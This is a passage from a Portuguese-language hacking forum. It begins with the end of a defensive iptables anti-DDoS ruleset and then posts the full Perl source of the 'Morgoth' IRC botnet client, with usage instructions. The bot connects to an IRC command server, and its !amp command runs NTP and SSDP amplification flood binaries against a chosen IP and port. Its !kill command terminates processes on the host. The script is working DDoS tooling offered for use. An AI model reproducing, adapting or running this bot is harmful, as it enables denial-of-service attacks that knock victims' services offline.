FIN,PSH,URG -j DROP /sbin/iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL SYN,FIN,PSH,URG -j DROP /sbin/iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP ### 5: Block spoofed packets ### /sbin/iptables -t mangle -A PREROUTING -s 224.0.0.0/3 -j DROP /sbin/iptables -t mangle -A PREROUTING -s 169.254.0.0/16 -j DROP /sbin/iptables -t mangle -A PREROUTING -s 172.16.0.0/12 -j DROP /sbin/iptables -t mangle -A PREROUTING -s 192.0.2.0/24 -j DROP /sbin/iptables -t mangle -A PREROUTING -s 192.168.0.0/16 -j DROP /sbin/iptables -t mangle -A PREROUTING -s 10.0.0.0/8 -j DROP /sbin/iptables -t mangle -A PREROUTING -s 0.0.0.0/8 -j DROP /sbin/iptables -t mangle -A PREROUTING -s 240.0.0.0/5 -j DROP /sbin/iptables -t mangle -A PREROUTING -s 127.0.0.0/8 ! -i lo -j DROP ### 6: Drop ICMP (you usually don't need this protocol) ### /sbin/iptables -t mangle -A PREROUTING -p icmp -j DROP ### 7: Drop fragments in all chains ### /sbin/iptables -t mangle -A PREROUTING -f -j DROP ### 8: Limit connections per source IP ### /sbin/iptables -A INPUT -p tcp -m connlimit --connlimit-above 111 -j REJECT --reject-with tcp-reset ### 9: Limit RST packets ### /sbin/iptables -A INPUT -p tcp --tcp-flags RST RST -m limit --limit 2/s --limit-burst 2 -j ACCEPT /sbin/iptables -A INPUT -p tcp --tcp-flags RST RST -j DROP ### 10: Limit new TCP connections per second per source IP ### /sbin/iptables -A INPUT -p tcp -m conntrack --ctstate NEW -m limit --limit 60/s --limit-burst 20 -j ACCEPT /sbin/iptables -A INPUT -p tcp -m conntrack --ctstate NEW -j DROP ### 11: Use SYNPROXY on all ports (disables connection limiting rule) ### #/sbin/iptables -t raw -D PREROUTING -p tcp -m tcp --syn -j CT --notrack #/sbin/iptables -D INPUT -p tcp -m tcp -m conntrack --ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7 --mss 1460 #/sbin/iptables -D INPUT -m conntrack --ctstate INVALID -j DROP
  14. [REDES]

    IRC-Amplification Usage: perl amp.pl -h irc.shadow-network.net -p 6667 -c shadow -b Morgoth -m NULL -s NULL PT:Coloque os amp na mesma pasta que o bot está, junto com as listas de amplificação. Quer editar algo na execução das listas/etc edite a partir da função amplification (linha 334). EN:Put the amp's aplications on the same dir with the amp.pl together with the amplification lists. Want to edit anything on the execution of the lists/etc edit from the function amplification (line 334). #|##############################################################################|# # Made in Shadow-NetworK # # By H3LLS1NG # # Greetz: nbdu1nder, Shíva, mitt1sx, Akir4, Ins3rt, Constantine, Chainksain, & # # nerdzin159, depois, SynChr0nize, KillerYBR, MRC, etc # # MORGOTH BOT - Aquele que se ergue em poder # # Para dar comandos no bot digite Morgoth antes, ex: Morgoth:!help # # To give commands to the bot type Morgoth before, ex: Morgoth:!help # #|##############################################################################|# #!/usr/bin/perl #Use: perl a.pl -h irc.shadow-network.net -p 6667 -c shadow -b Morgoth -s senha #|##############################################################################|# # Made in Shadow-NetworK # # By H3LLS1NG # # Greetz: nbdu1nder, Shíva, mitt1sx, Akir4, Ins3rt, Constantine, Chainksain, & # # nerdzin159, depois, SynChr0nize, KillerYBR, MRC, etc # # MORGOTH BOT - Aquele que se ergue em poder # # Para dar comandos no bot digite Morgoth antes, ex: Morgoth:!help # # To give commands to the bot type Morgoth before, ex: Morgoth:!help # #|##############################################################################|# # Lista de nicks 'master'. my @master_nicks = ( #"Jhowz", #"nick2", "H3LLS1NG" ); # Debug configuration (1 = Ativo, 0 = Inativo). my $debug = 0; # ############################################################################# # Main class. package application; { use constant FALSE => 0; use constant TRUE => 1; use strict; use warnings; my $attributes = { last_error => FALSE, host => undef, port => undef, name => undef, master => undef, password => undef, channel => undef }; # Parseia parametros e verifica se dados estão OK. Se estiver tudo correto, # seta atributo 'status' da classe para TRUE informando que tudo foi corregado # corretamente. Caso contrário setar o valor do mesmo para FALSE. sub new { my ($instance) = @_; my $cont = 0; foreach my $index (<@ARGV>) { if ($index =~ "-h") { $attributes -> {host} = $ARGV[$cont + 1]; } elsif ($index =~ "-p") { $attributes -> {port} = $ARGV[$cont + 1]; } elsif ($index =~ "-c") { $attributes -> {channel} = "#". $ARGV[$cont + 1]; } elsif ($index =~ "-b") { $attributes -> {name} = $ARGV[$cont + 1]; } elsif ($index =~ "-m") { $attributes -> {master} = $ARGV[$cont + 1]; } elsif ($index =~ "-s") { $attributes -> {password} = $ARGV[$cont + 1]; } $cont++; } if ( $attributes -> {host} && $attributes -> {port} && $attributes -> {master} && $attributes -> {channel} && $attributes -> {name} && $attributes -> {password} ) { $attributes -> {last_error} = TRUE; bless $attributes, $instance; return $attributes; } else { print "\n Use: perl bot.pl -h irc.host.net -p 6667 -m master -c #channel -s password -b ShadowBot\n\n"; print " -h -> IRC server.\n"; print " -p -> IRC port.\n"; print " -c -> Channel name.\n"; print " -m -> Master nick.\n"; print " -s -> Master password.\n"; print " -b -> Bot nick.\n\n"; $attributes -> {last_error} = FALSE; return undef; } } sub core { my ($this) = @_; if (my $irc = irc -> new ($this -> {host}, $this -> {port}, $this -> {name}, $this -> {master}, $this -> {channel}, $this -> {password})) { if ((my $result = irc -> status) == TRUE) { irc -> connect; } } } sub status { my ($this) = @_; return $this -> {last_error}; } } # ############################################################################# # IRC Control class. package irc; { use constant FALSE => 0; use constant TRUE => 1; use Socket; use strict; use warnings; my $attributes = { last_error => FALSE, # Configurações finais do bot. host => undef, # Endereço do servidor IRC. port => undef, # Porta do servidor IRC. name => undef, # Nick do bot. master => undef, # Nick do master. channel => undef, # Canal que o bot irá entrar por padrão. password => undef, # Senha do master. # Controle de usuarios. master_logged => FALSE, # TRUE = Master logado, FALSE = Master não logado. master_nick => undef # Nick do usuário logado como master. }; # Inicializa atributos da classe e conexão com servidor IRC. sub new { my ($instance, $host, $port, $name, $master, $channel, $password) = @_; if ($host && $port && $name && $master && $channel && $password) { $attributes -> {host} = $host; $attributes -> {port} = $port; $attributes -> {name} = $name; $attributes -> {master} = $master; $attributes -> {channel} = $channel; $attributes -> {password} = $password; $attributes -> {last_error} = TRUE; bless $attributes, $instance; return $attributes; } return undef; } # Conecta em servidor IRC. sub connect { print "\nConnecting in ". $attributes -> {host} ." ". $attributes -> {port} ."...\n" if $debug; print "\nIRC Server response...\n" if $debug; socket SOCKET, PF_INET, SOCK_STREAM, (getprotobyname('tcp'))[2]; connect SOCKET, pack_sockaddr_in($attributes -> {port}, inet_aton($attributes -> {host})); send SOCKET, "NICK ". $attributes -> {name} ."\r\n", 0; send SOCKET, "USER ". $attributes -> {name} ." * * :". $attributes -> {name} ."\r\n", 0; send SOCKET, "JOIN ". $attributes -> {channel} ."\r\n", 0; for ( my $cont = 0 ; my $response = <SOCKET>; $cont++ ) { chomp ($response = $response); if ($cont < 5) { send SOCKET, "JOIN ". $attributes -> {channel} ."\r\n", 0; } if ($response =~ "Nickname is already in use") { die "\nNickname is already in use.\n"; } elsif ($response =~ /PING(.*)/) { send SOCKET, "PONG$1\r\n", 0; print "PONG$1\n" if $debug; } # Command and control. my $result = irc -> core ($response); if ($result == 1) { last; } } close ( SOCKET ); print "\n\nConnection closed.\n" if $debug; } # Core, loop de entrada e saida dos dados vindo do servidor de IRC. # Método para controle dos comandos. sub core { my ($instance, $response) = @_; my @command = ( "!exit", "!help", #"!login", "!amp", "!kill" ); print ">> $response\n" if $debug; if ($response =~ /^:([^!]*)!(\S*) PRIVMSG (#\S+) :(.*)$/) { my $user = $1; my $host = $2; my $channel = $3; my $content = $4; my $botnick = $attributes -> {name}; if ($content =~ /^$botnick(.*)$/) { foreach my $index (@command) { my $str = $1; if ($str =~ /^(.*)$index(.*)$/) { $str = $2; $str =~ s/^\s+|\s+$//g; my @param = split / /, $str; if ($response =~ $index) { if ($index =~ "!amp") { if (irc -> check_login_status ($user) == TRUE) { if ($param[0] && $param[1] && $param[2] && !defined($param[3])) { irc -> amplification($param[0], $param[1], $param[2]); } else { send SOCKET, "PRIVMSG ". $attributes -> {channel} ." :4,1 ". $user ." Amplification syntax error! \r\n", 0; send SOCKET, "PRIVMSG ". $attributes -> {channel} ." :9,1 ". $user ." Use: 11,1". $attributes -> {name} .": !amp PROTOCOL IP PORT \r\n", 0; } return 0; } } if ($index =~ "!kill") { if (irc -> check_login_status ($user) == TRUE) { if ($param[0] && !defined($param[1])) { irc -> kill_application($param[0]); } else { send SOCKET, "PRIVMSG ". $attributes -> {channel} ." :4,1 ". $user ." Kill command syntax error! \r\n", 0; send SOCKET, "PRIVMSG ". $attributes -> {channel} ." :9,1 ". $user ." Use: 11,1". $attributes -> {name} .": !kill APPLICATION-NAME \r\n", 0; } } } if ($index =~ "!help") { irc -> show_help_banner; return 0; } #if ($index =~ "!login") { # irc -> process_account_login ( $user, $param[0], $param[1] ); # return 0; #} if ($index =~ "!exit") { if (irc -> check_login_status ($user) == TRUE) { send SOCKET, "PRIVMSG ". $attributes -> {channel} ." :9,1 ". $attributes -> {name} ." 11,1 Exited! \r\nQUIT\r\n", 0; return 1; } } } } } } } return 0; } # Processa login de usuários. sub process_account_login { my ($instance, $nickname, $username, $password) = @_; print "Nick: $nickname\nUser: $username\nPass: $password\n" if $debug; if (defined ($username) && defined ($password) && defined ($nickname)) { # Verifica se usuário já está logado. if ($attributes -> {master_logged} == TRUE && $nickname =~ $attributes -> {master}) { send SOCKET, "PRIVMSG ". $attributes -> {channel} ." :11,1 ". $nickname .", User already logged! \r\n", 0; return 0; } # Master login. if ( $nickname =~ $attributes -> {master} && $username =~ "master" && $password =~ $attributes -> {password} ) { send SOCKET, "PRIVMSG ". $attributes -> {channel} ." :9,1 ". $nickname .", Logged in successfully! \r\n", 0; $attributes -> {master_logged} = TRUE; return 0; } } # else... send SOCKET, "PRIVMSG ". $attributes -> {channel} ." :4,1 ". $nickname .", Error login the account. \r\n", 0; } sub check_login_status { my ($instance, $user) = @_; #if (defined ($user) ) { # if ($attributes -> {master_logged} == FALSE) { # send SOCKET, "PRIVMSG ". $attributes -> {channel} ." :4,1 ". $user ." You are not logged! \r\n", 0; # return FALSE; # } #} my $control = FALSE; foreach my $index (@master_nicks) { if ($user =~ $index) { $control = TRUE; last; } } unless ($control == TRUE) { send SOCKET, "PRIVMSG ". $attributes -> {channel} ." :4,1 ". $user ." You are not master! \r\n", 0; return FALSE; } return TRUE; } # Help banner. sub show_help_banner { my @banner = ( "4,1 -9,1 !help 4,1->11,1 Show help message.", "4,1 -9,1 !exit 4,1->11,1 Stop bot execution.", #"4,1 -9,1 !login 8,1[9,1user8,1] [9,1password8,1]4,1 -> 11,1Access account.", "4,1 -9,1 !amp 8,1[9,1protocol8,1] [9,1ip8,1] [9,1port8,1]4,1 -> 11,1DDoS methods.", "4,1 -9,1 !kill 8,1[9,1process name8,1] 4,1 -> 11,1Terminate process.", "4,1 -> 8,1Method...", "4,1 11,1 NTP Amplification", "4,1 11,1 SSDP Amplification", " " ); foreach my $index (@banner) { send SOCKET, "PRIVMSG ". $attributes -> {channel} ." :$index\r\n", 0; } } # Run application in machine. sub amplification { my ($instance, $protocolo, $ip, $port) = @_; my $command = ""; if ($protocolo =~ "ntp") { $command = "./ntp $ip $port 999 8 300 &"; } if ($protocolo =~ "ssdp") { $command = "./ssdp $ip $port 8 300 &"; } if (-e $protocolo) { system($command); my $output = "4,1 ->9,1 ". uc($protocolo) ." 4,1::11,1 attacking ". $ip .":". $port ." for 300 seconds... \r\n"; send SOCKET, "PRIVMSG ". $attributes -> {channel} ." :". $output, 0; } else { send SOCKET, "PRIVMSG ". $attributes -> {channel} ." :4,1 ". $protocolo ." file not exists! \r\n", 0; } print $command ."\n"; } # kill running Application. sub kill_application { my ($instance, $name) = @_; if (defined($name)) { system("killall -9 ". $name); send SOCKET, "PRIVMSG ". $attributes -> {channel} ." :11,1 Process finished: 9,1". $name ." \r\n", 0; } } sub status { return $attributes -> {last_error}; } } # ############################################################################# # Application startup (Main class). my $application = new application; if (defined($application)) { if ((my $result = $application -> status) == 1) { $application -> core; } } # EOF. # #############################################################################

Shadow Network

Seja Bem-Vindo ao nosso fórum, construído com o intuito de compartilhar idéias e conhecimentos ao alcance de qualquer pessoa que tenha vontade de aprender.

Atencao

Em caso de bugs/erros no forum, entre em contato com algum membro da equipe.